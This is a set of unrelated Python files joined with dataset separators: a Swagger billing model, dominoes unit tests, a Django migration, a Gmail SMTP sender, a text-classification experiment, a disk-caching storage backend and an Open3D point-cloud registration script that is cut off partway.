def postal_code(self, postal_code):
"""
Sets the postal_code of this OrderBilling.
Postal code
:param postal_code: The postal_code of this OrderBilling.
:type: str
"""
if postal_code is not None and len(postal_code) > 20:
raise ValueError("Invalid value for `postal_code`, length must be less than or equal to `20`")
self._postal_code = postal_code
@property
def state_region(self):
"""
Gets the state_region of this OrderBilling.
State for United States otherwise region or province for other countries
:return: The state_region of this OrderBilling.
:rtype: str
"""
return self._state_region
@state_region.setter
def state_region(self, state_region):
"""
Sets the state_region of this OrderBilling.
State for United States otherwise region or province for other countries
:param state_region: The state_region of this OrderBilling.
:type: str
"""
if state_region is not None and len(state_region) > 32:
raise ValueError("Invalid value for `state_region`, length must be less than or equal to `32`")
self._state_region = state_region
@property
def title(self):
"""
Gets the title of this OrderBilling.
Title
:return: The title of this OrderBilling.
:rtype: str
"""
return self._title
@title.setter
def title(self, title):
"""
Sets the title of this OrderBilling.
Title
:param title: The title of this OrderBilling.
:type: str
"""
if title is not None and len(title) > 50:
raise ValueError("Invalid value for `title`, length must be less than or equal to `50`")
self._title = title
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, OrderBilling):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
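# Hedged usage sketch (field values are illustrative only):
#
#   billing = OrderBilling(first_name="Ada", last_name="Lovelace",
#                          city="London", country_code="GB")
#   billing.to_dict()       # {'address1': None, ..., 'first_name': 'Ada', ...}
#   billing.city = "x" * 33 # raises ValueError: length must be less than or equal to 32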
|
StarcoderdataPython
|
140363
|
import collections
import dominoes
import unittest
class TestSeries(unittest.TestCase):
def test_init(self):
s1 = dominoes.Series()
self.assertEqual(len(s1.games), 1)
self.assertEqual(len(s1.games[0].board), 1)
self.assertEqual(s1.games[0].board.left_end(), 6)
self.assertEqual(s1.games[0].board.right_end(), 6)
hand_lengths1 = collections.Counter(len(h) for h in s1.games[0].hands)
self.assertEqual(hand_lengths1[6], 1)
self.assertEqual(hand_lengths1[7], 3)
self.assertTrue(s1.games[0].turn in range(4))
self.assertTrue(bool(s1.games[0].valid_moves))
self.assertIsNone(s1.games[0].result)
self.assertEqual(s1.scores, [0, 0])
self.assertEqual(s1.target_score, 200)
s2 = dominoes.Series(target_score=100)
self.assertEqual(len(s2.games), 1)
self.assertEqual(len(s2.games[0].board), 1)
self.assertEqual(s2.games[0].board.left_end(), 6)
self.assertEqual(s2.games[0].board.right_end(), 6)
hand_lengths2 = collections.Counter(len(h) for h in s2.games[0].hands)
self.assertEqual(hand_lengths2[6], 1)
self.assertEqual(hand_lengths2[7], 3)
self.assertTrue(s2.games[0].turn in range(4))
self.assertTrue(bool(s2.games[0].valid_moves))
self.assertIsNone(s2.games[0].result)
self.assertEqual(s2.scores, [0, 0])
self.assertEqual(s2.target_score, 100)
d = dominoes.Domino(1, 2)
s3 = dominoes.Series(starting_domino=d)
self.assertEqual(len(s3.games), 1)
self.assertEqual(len(s3.games[0].board), 1)
self.assertEqual(s3.games[0].board.left_end(), 1)
self.assertEqual(s3.games[0].board.right_end(), 2)
hand_lengths3 = collections.Counter(len(h) for h in s3.games[0].hands)
self.assertEqual(hand_lengths3[6], 1)
self.assertEqual(hand_lengths3[7], 3)
self.assertTrue(s3.games[0].turn in range(4))
self.assertTrue(bool(s3.games[0].valid_moves))
self.assertIsNone(s3.games[0].result)
self.assertEqual(s3.scores, [0, 0])
self.assertEqual(s3.target_score, 200)
def test_is_over(self):
s = dominoes.Series()
self.assertFalse(s.is_over())
s.scores = [199, 199]
self.assertFalse(s.is_over())
s.scores = [200, 199]
self.assertTrue(s.is_over())
s.scores = [199, 200]
self.assertTrue(s.is_over())
s.scores = [200, 200]
self.assertTrue(s.is_over())
s.scores = [201, 201]
self.assertTrue(s.is_over())
def test_next_game(self):
s = dominoes.Series()
str1 = str(s)
repr1 = repr(s)
self.assertRaises(dominoes.GameInProgressException, s.next_game)
self.assertEqual(len(s.games), 1)
self.assertEqual(len(s.games[0].board), 1)
self.assertTrue(bool(s.games[0].valid_moves))
self.assertIsNone(s.games[0].result)
self.assertEqual(s.scores, [0, 0])
self.assertEqual(s.target_score, 200)
self.assertTrue('Series to 200 points:' in str1)
self.assertTrue('Team 0 has 0 points.' in str1)
self.assertTrue('Team 1 has 0 points.' in str1)
self.assertEqual(str1, repr1)
scores = [200, 200]
s.scores = scores
str2 = str(s)
repr2 = repr(s)
self.assertRaises(dominoes.SeriesOverException, s.next_game)
self.assertEqual(len(s.games), 1)
self.assertEqual(len(s.games[0].board), 1)
self.assertTrue(bool(s.games[0].valid_moves))
self.assertIsNone(s.games[0].result)
self.assertEqual(s.scores, scores)
self.assertEqual(s.target_score, 200)
self.assertTrue('Series to 200 points:' in str2)
self.assertTrue('Team 0 has 200 points.' in str2)
self.assertTrue('Team 1 has 200 points.' in str2)
self.assertEqual(str2, repr2)
s.scores = [0, 0]
s.games[0].result = dominoes.Result(0, True, 50)
g1 = s.next_game()
str3 = str(s)
repr3 = repr(s)
self.assertEqual(len(s.games), 2)
self.assertEqual(len(g1.board), 0)
self.assertEqual(g1.turn, 0)
self.assertTrue(bool(g1.valid_moves))
self.assertIsNone(g1.result)
self.assertEqual(s.scores, [50, 0])
self.assertEqual(s.target_score, 200)
self.assertTrue('Series to 200 points:' in str3)
self.assertTrue('Team 0 has 50 points.' in str3)
self.assertTrue('Team 1 has 0 points.' in str3)
self.assertEqual(str3, repr3)
s.games[1].result = dominoes.Result(1, False, 50)
g2 = s.next_game()
str4 = str(s)
repr4 = repr(s)
self.assertEqual(len(s.games), 3)
self.assertEqual(len(g2.board), 0)
self.assertEqual(g2.turn, 2)
self.assertTrue(bool(g2.valid_moves))
self.assertIsNone(g2.result)
self.assertEqual(s.scores, [100, 0])
self.assertEqual(s.target_score, 200)
self.assertTrue('Series to 200 points:' in str4)
self.assertTrue('Team 0 has 100 points.' in str4)
self.assertTrue('Team 1 has 0 points.' in str4)
self.assertEqual(str4, repr4)
s.games[2].result = dominoes.Result(2, True, 50)
g3 = s.next_game()
str5 = str(s)
repr5 = repr(s)
self.assertEqual(len(s.games), 4)
self.assertEqual(len(g3.board), 0)
self.assertEqual(g3.turn, 2)
self.assertTrue(bool(g3.valid_moves))
self.assertIsNone(g3.result)
self.assertEqual(s.scores, [150, 0])
self.assertEqual(s.target_score, 200)
self.assertTrue('Series to 200 points:' in str5)
self.assertTrue('Team 0 has 150 points.' in str5)
self.assertTrue('Team 1 has 0 points.' in str5)
self.assertEqual(str5, repr5)
s.games[3].result = dominoes.Result(3, False, -50)
g4 = s.next_game()
str6 = str(s)
repr6 = repr(s)
self.assertEqual(len(s.games), 5)
self.assertEqual(len(g4.board), 0)
self.assertEqual(g4.turn, 3)
self.assertTrue(bool(g4.valid_moves))
self.assertIsNone(g4.result)
self.assertEqual(s.scores, [150, 50])
self.assertEqual(s.target_score, 200)
self.assertTrue('Series to 200 points:' in str6)
self.assertTrue('Team 0 has 150 points.' in str6)
self.assertTrue('Team 1 has 50 points.' in str6)
self.assertEqual(str6, repr6)
s.games[4].result = dominoes.Result(2, False, 0)
g5 = s.next_game()
str7 = str(s)
repr7 = repr(s)
self.assertEqual(len(s.games), 6)
self.assertEqual(len(g5.board), 0)
self.assertEqual(g5.turn, 3)
self.assertTrue(bool(g5.valid_moves))
self.assertIsNone(g5.result)
self.assertEqual(s.scores, [150, 50])
self.assertEqual(s.target_score, 200)
self.assertTrue('Series to 200 points:' in str7)
self.assertTrue('Team 0 has 150 points.' in str7)
self.assertTrue('Team 1 has 50 points.' in str7)
self.assertEqual(str7, repr7)
s.games[5].result = dominoes.Result(0, True, 100)
self.assertIsNone(s.next_game())
str8 = str(s)
repr8 = repr(s)
self.assertEqual(len(s.games), 6)
self.assertEqual(s.scores, [250, 50])
self.assertEqual(s.target_score, 200)
self.assertTrue('Series to 200 points:' in str8)
self.assertTrue('Team 0 has 250 points.' in str8)
self.assertTrue('Team 1 has 50 points.' in str8)
self.assertEqual(str8, repr8)
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
62958
|
<filename>tests/__init__.py
__author__ = 'Elad'
|
StarcoderdataPython
|
3302975
|
<reponame>Hoter11/WebProject
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-19 10:25
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0003_entry_text'),
]
operations = [
migrations.AddField(
model_name='entry',
name='identifier',
field=models.CharField(default=None, max_length=4),
preserve_default=False,
),
]
|
StarcoderdataPython
|
4939423
|
<gh_stars>1-10
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import json
import getpass
"""
We connect to Gmail's SMTP server as a client (587 is the submission port).
smtp_mailer.ehlo() sends a command identifying ourselves to the server; the smtplib
documentation says we don't need to call ehlo() explicitly, but we do it anyway for
reference and to make clear roughly what happens inside the smtplib module. We then
use smtp_mailer.starttls() to start the TLS protocol, so the email is sent securely.
"""
smtp_mailer = smtplib.SMTP("smtp.gmail.com", 587)
smtp_mailer.ehlo()
smtp_mailer.starttls()
"""
Load details.json to prefill some fields of the email message that is eventually sent; this makes testing easier.
"""
with open("../supporting_files/details.json") as details:
json_data = json.loads(details.read())
user_email = json_data["MyEmail"]
# Always asks for user password instead of storing, for security
user_password = getpass.getpass(f"Enter the password for {user_email} (The password will not show " "up for security purposes): ")
smtp_mailer.login(user_email, user_password)
print("Login successful")
message = MIMEMultipart()
message["From"] = user_email
message["To"] = json_data["To"]
message["Subject"] = json_data["Subject"]
email_body = json_data["Body"]
message.attach(MIMEText(email_body, "plain"))
smtp_mailer.send_message(message)
smtp_mailer.quit()
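# Hedged alternative sketch: smtplib.SMTP can also be used as a context manager
# (Python 3.3+), which closes the connection even if send_message() raises.
#
#   with smtplib.SMTP("smtp.gmail.com", 587) as mailer:
#       mailer.ehlo()
#       mailer.starttls()
#       mailer.login(user_email, user_password)
#       mailer.send_message(message)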
|
StarcoderdataPython
|
12804274
|
'''
This is based on cnn35_64. This is after the first pilot.
Changes:
- don't filter out '#' in the tokenizer; tokenize train and test together, or save the tokenizer: https://stackoverflow.com/questions/45735070/keras-text-preprocessing-saving-tokenizer-object-to-file-for-scoring
- use the 'number' w2v vector as the representation for any digit
- the shuffling problem should be checked before advancing: plot a random selection of conv1 layers; they should all be 14 or 15.
- tune hyperparameters.
'''
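# Hedged sketch of the "save tokenizer" change mentioned above (the file name is an
# assumption; Keras Tokenizer objects pickle cleanly, so the fitted vocabulary can be
# reused unchanged at scoring time):
#
#   import pickle
#   from keras.preprocessing.text import Tokenizer
#
#   tokenizer = Tokenizer(filters='')
#   tokenizer.fit_on_texts(Xtrain + Xtest)
#   with open('tokenizer.pkl', 'wb') as f:
#       pickle.dump(tokenizer, f, protocol=pickle.HIGHEST_PROTOCOL)
#   # later, for scoring:
#   with open('tokenizer.pkl', 'rb') as f:
#       tokenizer = pickle.load(f)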
from sklearn.linear_model import LogisticRegression
import time
import datetime
import numpy as np
import pandas as pd
from keras.preprocessing.text import Tokenizer
import pickle
from sklearn.svm import LinearSVC
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer, TfidfVectorizer
from sklearn.pipeline import Pipeline
from sklearn.metrics import classification_report, confusion_matrix
import matplotlib.pyplot as plt
plt.switch_backend('agg')
from keras.utils import np_utils
from numpy.random import seed
seed(123)
import os
import data_helpers
import config
# Parameters
# =====================================================================
categories = config.categories
verbose = config.verbose
save_checkpoints = config.save_checkpoints
plot_RSA = config.plot_RSA
if config.local_or_cluster:
categories = categories[:3]
epochs=1
verbose=1
else:
epochs = config.epochs # it will probably need more.
# epochs = 6
#
save_checkpoints=False
print('running for '+str(epochs)+' epochs')
if config.local_or_cluster:
# directory_name = 'svm_gs0_test'
directory_name = datetime.datetime.now().strftime("%y-%m-%d-%H-%M-%S")
file_name = 'logreg_tfidf'
else:
# directory_name = 'svm_gs0_test'
directory_name = datetime.datetime.now().strftime("%y-%m-%d-%H-%M-%S")
file_name = os.path.basename(__file__)
print('running '+directory_name+' '+file_name)
categories = ['University','Decoration','MilitaryConflict','MilitaryPerson','Politician', 'Monarch']
Xtrain, Ytrain = data_helpers.load_all_data(config.train_path,config.validation_path, categories, shuffle=False) # I changed this so it combines train and test
Xtest, Ytest = data_helpers.load_data(config.test_path, categories)
# Xtest_raw, Ytest_raw = data_helpers.load_data_raw(config.test_path, categories)
# X, y= data_helpers.load_whole_dataset(config.train_path, config.validation_path, config.test_path,categories,load_all=True, shuffle=False,one_hot=False)
# Remove Stopwords
# with open('stopwords-it2.txt', 'r') as f:
# sw = f.readlines()
#
# italian_stop_words = [n.replace('\n','') for n in sw]
#
# Xtrain2 = []
# for sentence in Xtrain:
# sentence_no_stopwords = ' '.join([word for word in sentence.split() if word not in italian_stop_words])
# Xtrain2.append(sentence_no_stopwords)
#
# Xtest2 = []
# for sentence in Xtest:
# sentence_no_stopwords = ' '.join([word for word in sentence.split() if word not in italian_stop_words])
# Xtest2.append(sentence_no_stopwords)
# #
# # ## Encode Ytrain
# # # =====================================================================================
# # one hot encode and integer encode
# # Ytrain_encoded = np_utils.to_categorical(Ytrain)
# # Ytrain_integer = np.array(Ytrain)
# # Ytest_encoded = np_utils.to_categorical(Ytest)
# # Ytest_integer = np.array(Ytest)
# #
# # # Zero pad (encode) Xtrain and Xtest
# # # ==================================================================================================
# tokenizer = Tokenizer(filters='') #depending on word embedding, set lower=False.
# tokenizer.fit_on_texts(np.append(np.array(Xtrain2), np.array(Xtest2)))
# sequences = tokenizer.texts_to_sequences(Xtrain2)
# sequences2 = tokenizer.texts_to_sequences(Xtest2)
# # sequences3 = tokenizer.texts_to_sequences(X)
# word_index = tokenizer.word_index
# print('Found %s unique tokens.' % len(word_index))
#
# # Xtrain_encoded = pad_sequences(sequences, maxlen=sequence_length, padding='post')
# # Xtest_encoded = pad_sequences(sequences2, maxlen=sequence_length, padding='post')
# # X_encoded = pad_sequences(sequences3, maxlen=sequence_length, padding='post')
#
# def load_obj(path_and_filename):
# with open(path_and_filename, 'rb') as f:
# return pickle.load(f)
#
# embeddings_index = load_obj(config.word_embeddings_path+'/gensim_it_w2v.pkl') #dictionary embeddings_index.get('è') returns word embedding
#
#
#
# number = np.random.normal(0., 0.23, 300)
#
# embedding_dim = 300
#
# embedding_matrix = np.zeros((len(word_index) + 1, embedding_dim)) # this will be all embeddings for my vocabulary
#
# for word, i in word_index.items():
# embedding_vector = embeddings_index.get(word)
# if embedding_vector is not None:
# # words not found in embedding index will be all-zeros.
# embedding_matrix[i] = embedding_vector
# elif "#" in word:
# embedding_matrix[i] = number
# Create average sentence vectors
# Xtrain = []
# for sequence in sequences:
# all_word_embeddings = []
# for word_id in sequence:
# embedding = embedding_matrix[word_id]
# if np.sum(embedding)!=0.0:
# all_word_embeddings.append(embedding)
# mean_sentence_vector = list(pd.DataFrame(all_word_embeddings).mean())
# if len(mean_sentence_vector)==0:
# mean_sentence_vector = list(np.random.normal(0., 0.23, 300))
# Xtrain.append(mean_sentence_vector)
#
# Xtest = []
# for sequence in sequences2:
# all_word_embeddings = []
# for word_id in sequence:
# embedding = embedding_matrix[word_id]
# all_word_embeddings.append(embedding)
# mean_sentence_vector = list(pd.DataFrame(all_word_embeddings).mean())
# if len(mean_sentence_vector)==0:
# mean_sentence_vector = list(np.random.normal(0., 0.23, 300))
# Xtest.append(mean_sentence_vector)
path_to_dir = os.path.join(config.save_to, directory_name + '/')
try: os.makedirs(path_to_dir)
except: pass
print('directory_name: '+directory_name)
print('path_to_dir: '+path_to_dir)
# Xtrain = np.array(Xtrain)
# Xtest = np.array(Xtest)
#
# np.save(config.word_embeddings_path+'Xtrain_w2v_mean', Xtrain)
# np.save(config.word_embeddings_path+'Xtest_w2v_mean', Xtest)
# Model
## ======================================================================================================
print("Creating Model...")
with open(path_to_dir + 'log.txt', 'a+') as f:
f.write(file_name + '\n')
f.write(directory_name+ '\n\n')
# Cs = [0.01, 0.1, 1, 10]
# kernels = ['linear', 'rbf']
# kernels = ['linear']
# max_features_all = [100000,None]
# stop_words = [italian_stop_words, None]
# Final
# Top1 and Top5 accuracy on test set.
# clf = LinearSVC(verbose=verbose)
if config.local_or_cluster:
Xtrain_toy = []
for i in range(0,len(Xtrain), 100):
Xtrain_toy.append(Xtrain[i])
Ytrain_toy = []
for i in range(0, len(Ytrain), 100):
Ytrain_toy.append(Ytrain[i])
Xtest_toy = []
for i in range(0,len(Xtest), 100):
Xtest_toy.append(Xtest[i])
Ytest_toy = []
for i in range(0, len(Ytest), 100):
Ytest_toy.append(Ytest[i])
Xtrain = Xtrain_toy[:]
Ytrain = Ytrain_toy[:]
Xtest = Xtest_toy[:]
Ytest = Ytest_toy[:]
start = time.time()
pipeline = Pipeline([('vect', CountVectorizer(ngram_range=(1, 3), min_df=2, max_features=None)),
('tfidf', TfidfTransformer()),
('clf', LogisticRegression(verbose=verbose, n_jobs=-1)), ])
pipeline.fit(Xtrain, Ytrain)
probs = pipeline.predict_proba(Xtest)
best_1 = np.argsort(probs, axis=1)
best_1 = [n[-1] for n in best_1]
top1_accuracy = np.round(np.sum(np.array(Ytest)==np.array(best_1))/len(Ytest),4)
best_2 = np.argsort(probs, axis=1)
best_2 = [n[-2:] for n in best_2]
top2_acc = []
for i in range(len(best_2)):
if Ytest[i] in best_2[i]:
top2_acc.append(1)
else:
top2_acc.append(0)
top2_accuracy = np.round(np.sum(top2_acc)/len(Ytest),4)
best_3 = np.argsort(probs, axis=1)
best_3 = [n[-3:] for n in best_3]
top3_acc = []
for i in range(len(best_3)):
if Ytest[i] in best_3[i]:
top3_acc.append(1)
else:
top3_acc.append(0)
top3_accuracy = np.round(np.sum(top3_acc)/len(Ytest),4)
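# Hedged refactoring sketch (assumption: not used by the code below, which keeps the explicit
# top-1/top-2/top-3 blocks above): the repeated argsort pattern can be expressed once for any k.
def top_k_accuracy(probs, y_true, k):
    top_k = np.argsort(probs, axis=1)[:, -k:]
    hits = [1 if label in row else 0 for label, row in zip(y_true, top_k)]
    return np.round(np.sum(hits) / len(y_true), 4)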
#
# best_5 = np.argsort(probs, axis=1)
# best_5 = [n[-5:] for n in best_5]
# top5_acc = []
# for i in range(len(best_5)):
# if Ytest[i] in best_5[i]:
# top5_acc.append(1)
# else:
# top5_acc.append(0)
# top5_accuracy = np.round(np.sum(top5_acc)/len(Ytest),4)
# Ypredict_encoded = np_utils.to_categorical(Ypredict.argmax(axis=-1))
# Ypredict_integer = Ypredict.argmax(axis=-1)
# Save outputs
np.save(path_to_dir + 'Ypredict_integer', best_1)
np.save(path_to_dir + 'accuracy_integer_top3', top3_acc)
# np.save(path_to_dir + 'accuracy_integer_top5', top5_acc)
import plot_outputs
clas_rep = classification_report(Ytest, best_1,target_names=categories)
df_clas_rep, df_clas_rep_latex = plot_outputs.classification_report_df(clas_rep)
cm = confusion_matrix(y_true=Ytest, y_pred=best_1,sample_weight=None) # TODO:change to test set for final model
pd.DataFrame(cm, columns=categories, index=categories).to_csv(path_to_dir+'cm.csv')
with open(path_to_dir + 'log.txt', 'a+') as f:
end = time.time()
    f.write('=================\n')
f.write('time: ' + str(np.round(end - start, 2))+'\n')
f.write('Top-1 Accuracy: ' +str(top1_accuracy)+'\n')
f.write('Top-2 Accuracy: ' + str(top2_accuracy) + '\n')
f.write('Top-3 Accuracy: ' + str(top3_accuracy) + '\n')
# f.write('Top-5 Accuracy: ' + str(top5_accuracy) + '\n')
f.write(str(pipeline.get_params())+'\n\n')
f.write('Classification Report: \n'+df_clas_rep_latex)
#
#
# # CV
# # ====================================================================
# from sklearn.model_selection import cross_val_score
#
# start = time.time()
# scores = cross_val_score(pipeline, Xtrain, Ytrain, cv=5, n_jobs=-1)
#
# with open(path_to_dir + 'log.txt', 'a+') as f:
# end = time.time()
# f.write(str(i)+'=================\n')
# f.write('time: ' + str(np.round(end - start, 2))+'\n')
# f.write(str(scores)+'\n')
# f.write('The mean score and the 95% confidence interval of the score estimate are hence given by:'+ '\n')
# f.write('Accuracy: '+str(np.round(scores.mean(),4))+' +/- '+str((scores.std() * 2).round(2))+ '\n')
# f.write('SD: '+str(scores.std())+' variance: '+str(scores.var())+ '\n')
# TIFIDF
# ================================================================================================
# def top_tfidf_feats(row, features, top_n=20):
# ''' Get top n tfidf values in row and return them with their corresponding feature names.'''
# topn_ids = np.argsort(row)[::-1][:top_n]
# top_feats = [(features[i], row[i]) for i in topn_ids]
# df = pd.DataFrame(top_feats)
# df.columns = ['feature', 'tfidf']
# return df
#
# # def top_feats_in_doc(Xtr, features, row_id, top_n=25):
# # ''' Top tfidf features in specific document (matrix row) '''
# # row = np.squeeze(Xtr[row_id].toarray())
# # return top_tfidf_feats(row, features, top_n)
#
#
# def top_mean_feats(Xtr, features, grp_ids=None, min_tfidf=0.1, top_n=25):
# ''' Return the top n features that on average are most important amongst documents in rows
# indentified by indices in grp_ids. '''
# if grp_ids:
# D = Xtr[grp_ids].toarray()
# else:
# D = Xtr.toarray()
# D[D < min_tfidf] = 0
# tfidf_means = np.mean(D, axis=0)
# return top_tfidf_feats(tfidf_means, features, top_n)
#
# def top_feats_by_class(Xtr, y, features, min_tfidf=0.1, top_n=25):
# ''' Return a list of dfs, where each df holds top_n features and their mean tfidf value
# calculated across documents with the same class label. '''
# dfs = []
# labels = np.unique(y)
# for label in labels:
# ids = np.where(y==label)
# feats_df = top_mean_feats(Xtr, features, ids, min_tfidf=min_tfidf, top_n=top_n)
# feats_df.label = label
# dfs.append(feats_df)
# return dfs
#
#
#
# def plot_tfidf_classfeats_h(dfs):
# ''' Plot the data frames returned by the function plot_tfidf_classfeats(). '''
# fig = plt.figure(figsize=(12, 9), facecolor="w")
# x = np.arange(len(dfs[0]))
# for i, df in enumerate(dfs):
# ax = fig.add_subplot(1, len(dfs), i+1)
# ax.spines["top"].set_visible(False)
# ax.spines["right"].set_visible(False)
# ax.set_frame_on(False)
# ax.get_xaxis().tick_bottom()
# ax.get_yaxis().tick_left()
# ax.set_xlabel("Mean Tf-Idf Score", labelpad=16, fontsize=14)
# ax.set_title("label = " + str(df.label), fontsize=16)
# ax.ticklabel_format(axis='x', style='sci', scilimits=(-2,2))
# ax.barh(x, df.tfidf, align='center', color='#3F5D7D')
# ax.set_yticks(x)
# ax.set_ylim([-1, x[-1]+1])
# yticks = ax.set_yticklabels(df.feature)
# plt.subplots_adjust(bottom=0.09, right=0.97, left=0.15, top=0.95, wspace=0.52)
# plt.show()
#
#
# tfidf = TfidfVectorizer(min_df=2, max_features=None, ngram_range=(1, 3))
#
# Xtr = tfidf.fit_transform(np.array(Xtrain))
# feature_array = np.array(tfidf.get_feature_names())
# response = tfidf.transform(['it can fly'])
# tfidf_sorting = np.argsort(np.array(response)).flatten()[::-1]
# n = 3
# top_n = feature_array[tfidf_sorting][:n]
#
#
#
#
#
# vec = vec_pipe.named_steps['vec']
# features = vec.get_feature_names()
#
# dfs = top_feats_by_class(Xtr, Ytrain, features, min_tfidf=0.1, top_n=20)
# plot_tfidf_classfeats_h(dfs)
# Gridsearch
# =============
#
# Cs = [1]
# # kernels = ['linear', 'rbf']
# kernels = ['linear']
# max_features_all = [None]
# # stop_words = [None]
#
#
# l=[]
# for kernel in kernels:
# for C in Cs:
# for max_features in max_features_all:
# l.append([kernel, C, max_features])
#
#
# gs_numb = int(sys.argv[1])
# i = int(sys.argv[1])
# print(i)
# for parameters in l[gs_numb:gs_numb+6]:
# # drop, batch_size, optimizer, activation2 = parameters
#
# kernel, C, max_features = parameters
# # if kernel == 'linear':
# # pipeline = Pipeline([('vect', CountVectorizer(ngram_range=(1, 3), min_df=2, max_features=max_features)),
# # ('tfidf', TfidfTransformer()),
# # ('clf', LogisticRegression(C=C, verbose=verbose, n_jobs=-1)), ])
# # else:
# # pipeline = Pipeline([('vect', CountVectorizer(ngram_range=(1, 3), min_df=2, max_features=max_features)),
# # ('tfidf', TfidfTransformer()),
# # ('clf', SVC(C=C, kernel=kernel, verbose=verbose)), ])
# clf = LogisticRegression(C=C, verbose=verbose, n_jobs=-1)
# start = time.time()
# clf.fit(Xtrain, Ytrain)
# accuracy = clf.score(Xtest, Ytest)
# with open(path_to_dir + 'log.txt', 'a+') as f:
# end = time.time()
# f.write(str(i)+'=================\n')
# f.write('time: ' + str(np.round(end - start, 2))+'\n')
# f.write('Parameters: '+str(parameters)+'\n')
# f.write('Loss and Accuracy: ' +str(accuracy)+'\n')
# f.write(str(np.round(accuracy,4)) + '\n\n')
# i += 1
#
# if save_checkpoints:
# filepath = path_to_dir+"weights-improvement-{epoch:02d}-{val_acc:.2f}.hdf5" #https://machinelearningmastery.com/check-point-deep-learning-models-keras/
# checkpoint = ModelCheckpoint(filepath, monitor='val_acc', verbose=verbose, save_best_only=True, mode='auto')
#
# print("Training Model...")
# if save_checkpoints:
# history = model.fit(Xtrain_encoded, Ytrain_encoded, batch_size=batch_size, epochs=epochs, verbose=verbose, callbacks=[checkpoint]) # starts training
# else:
# history = model.fit(Xtrain_encoded,Ytrain_encoded, batch_size=batch_size, epochs=epochs, verbose=verbose) # starts training
# outputs:
# ============================================================================================================================
# SAVE
|
StarcoderdataPython
|
382470
|
from __future__ import absolute_import, division, print_function, unicode_literals
import hashlib
import io
import warnings
from diskcache import Cache
from ._base import Backend
SIZE_LIMIT = 5e9
CACHE_VERSION = "v0"
class CachingBackend(Backend):
def __init__(self, cacheroot, authoritative_backend):
self._cacheroot = cacheroot
self._authoritative_backend = authoritative_backend
self._cache = Cache(cacheroot, size_limit=int(SIZE_LIMIT))
def read_contextmanager(self, name, checksum_sha256=None, seekable=False):
if checksum_sha256 is not None:
return _CachingBackendContextManager(
self._authoritative_backend, self._cache, name, checksum_sha256)
else:
return self._authoritative_backend.read_contextmanager(
name, checksum_sha256, seekable=seekable)
def write_file_handle(self, name):
return self._authoritative_backend.write_file_handle(name)
class _CachingBackendContextManager(object):
def __init__(self, authoritative_backend, cache, name, checksum_sha256):
self.authoritative_backend = authoritative_backend
self.cache = cache
self.name = name
self.checksum_sha256 = checksum_sha256
self.handle = None
def __enter__(self):
cache_key = "{}-{}".format(CACHE_VERSION, self.checksum_sha256)
try:
file_data = self.cache.read(cache_key)
except KeyError:
# not in cache :(
with self.authoritative_backend.read_contextmanager(self.name) as sfh:
file_data = sfh.read()
# TODO: consider removing this if we land a more generalized solution that
# protects against corruption regardless of backend.
sha256 = hashlib.sha256(file_data).hexdigest()
if sha256 != self.checksum_sha256:
warnings.warn(
"Checksum of tile data does not match the manifest checksum! Not "
"writing to cache")
else:
self.cache.set(cache_key, file_data)
self.handle = io.BytesIO(file_data)
else:
# If the data is small enough, the DiskCache library returns the cache data
# as bytes instead of a buffered reader.
# In that case, we want to wrap it in a file-like object.
if isinstance(file_data, io.IOBase):
self.handle = file_data
else:
self.handle = io.BytesIO(file_data)
return self.handle.__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
if self.handle is not None:
return self.handle.__exit__(exc_type, exc_val, exc_tb)
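# Hedged usage sketch (assumptions: an authoritative store can be any object exposing the same
# read_contextmanager/write_file_handle interface; the in-memory fake and the temporary cache
# directory below are illustrative only, not part of this module's API).
if __name__ == "__main__":
    import tempfile

    class _InMemoryBackend(object):
        def __init__(self, blobs):
            self._blobs = blobs

        def read_contextmanager(self, name, checksum_sha256=None, seekable=False):
            # BytesIO is itself a context manager, so it can stand in for a read handle.
            return io.BytesIO(self._blobs[name])

        def write_file_handle(self, name):
            raise NotImplementedError

    payload = b"tile-data"
    checksum = hashlib.sha256(payload).hexdigest()
    backend = CachingBackend(tempfile.mkdtemp(), _InMemoryBackend({"tile0": payload}))
    with backend.read_contextmanager("tile0", checksum_sha256=checksum) as fh:
        assert fh.read() == payload  # a second read would be served from the on-disk cache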
|
StarcoderdataPython
|
8150334
|
<reponame>felixfrank/Open3D
# Open3D: www.open3d.org
# The MIT License (MIT)
# See license file or visit www.open3d.org for details
from open3d import *
import numpy as np
if __name__ == "__main__":
set_verbosity_level(VerbosityLevel.Debug)
pcds = []
for i in range(3):
pcd = read_point_cloud(
"../../TestData/ICP/cloud_bin_%d.pcd" % i)
downpcd = voxel_down_sample(pcd, voxel_size = 0.02)
pcds.append(downpcd)
draw_geometries(pcds)
pose_graph = PoseGraph()
odometry = np.identity(4)
pose_graph.nodes.append(PoseGraphNode(odometry))
n_pcds = len(pcds)
for source_id in range(n_pcds):
for target_id in range(source_id + 1, n_pcds):
source = pcds[source_id]
target = pcds[target_id]
print("Apply point-to-plane ICP")
icp_coarse = registration_icp(source, target, 0.3,
np.identity(4),
TransformationEstimationPointToPlane())
icp_fine = registration_icp(source, target, 0.03,
icp_coarse.transformation,
TransformationEstimationPointToPlane())
transformation_icp = icp_fine.transformation
information_icp = get_information_matrix_from_point_clouds(
source, target, 0.03, icp_fine.transformation)
print(transformation_icp)
# draw_registration_result(source, target, np.identity(4))
print("Build PoseGraph")
if target_id == source_id + 1: # odometry case
odometry = np.dot(transformation_icp, odometry)
pose_graph.nodes.append(
PoseGraphNode(np.linalg.inv(odometry)))
pose_graph.edges.append(
PoseGraphEdge(source_id, target_id,
